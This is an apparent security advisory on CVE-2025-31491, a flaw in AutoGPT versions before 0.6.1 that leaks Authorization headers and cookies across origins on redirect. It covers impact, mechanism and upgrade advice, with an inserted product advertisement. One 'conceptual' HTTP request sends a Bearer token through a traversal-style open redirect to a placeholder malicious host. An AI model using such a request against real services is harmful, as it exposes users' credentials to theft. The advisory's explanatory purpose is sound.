Overview
The CVE-2025-31491 is a serious vulnerability affecting AutoGPT, a popular platform for automating complex workflows with continuous artificial intelligence agents. This vulnerability allows the leakage of cross-domain cookies and protected headers, which could potentially lead to system compromise or data leakage. It is a severe issue that affects all users of AutoGPT prior to the 0.6.1 version and requires immediate attention due to its high severity score of 8.6 on the Common Vulnerability Scoring System (CVSS).
Given that AutoGPT is widely used for managing AI-driven workflows, this vulnerability could have a significant impact on numerous businesses and organizations. The potential for data leakage raises concerns about the exposure of sensitive information, including authorization credentials and private cookies, which could subsequently be exploited by malicious actors.
Vulnerability Summary
CVE ID: CVE-2025-31491
Severity: High (8.6 CVSS)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise and potential data leakage
Affected Products
Share secrets securely
Ameeba is private infrastructure for communication and sensitive work built on encrypted identity instead of exposed corporate identity systems.
Passwords, credentials, confidential files, screenshots, internal discussions, sensitive AI context, and private coordination should not become exposed across ordinary communication platforms.
- • Encrypted identity
- • Private Spaces for organizations and teams
- • End-to-end encrypted chat, calls, files, and notes
- • Sensitive AI work and protected collaboration
- • Built for information that cannot leak
Our mission is to secure human work alongside AI.
Product | Affected Versions
AutoGPT | Prior to 0.6.1
How the Exploit Works
This exploit takes advantage of a design flaw in AutoGPT’s request wrapper around the requests Python library. When a redirect is not followed by the initial request and is re-requested by the wrapper using the new location, security-sensitive headers such as the Authorization and Proxy-Authorization header, and cookies are not accounted for and should not be sent cross-origin. If a malicious actor can coerce the script into visiting a URL with an open redirect vulnerability with the Authorization header, the credentials in the Authorization header will be leaked.
Conceptual Example Code
In this hypothetical example, a malicious actor could exploit the vulnerability by manipulating a script to visit a URL with an open redirect vulnerability. Here’s an example of such a scenario using a GitHub API request:
GET /repos/{owner}/{repo}/issues/comments/{comment_id}/../../../../../redirect/?url=https://malicious-site.com HTTP/1.1
Host: api.github.com
Authorization: Bearer <GitHub_Credentials>In this example, if the GitHub API were to suffer from an open redirect vulnerability, the script could be tricked into visiting the malicious site with the Authorization header, leading to the leakage of GitHub credentials.
Mitigation and Recommendations
All users of AutoGPT are advised to upgrade to version 0.6.1 or later, where this vulnerability has been fixed. In the interim, users can employ a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) as temporary mitigation. Always ensure to follow best practices for secure coding to prevent such vulnerabilities.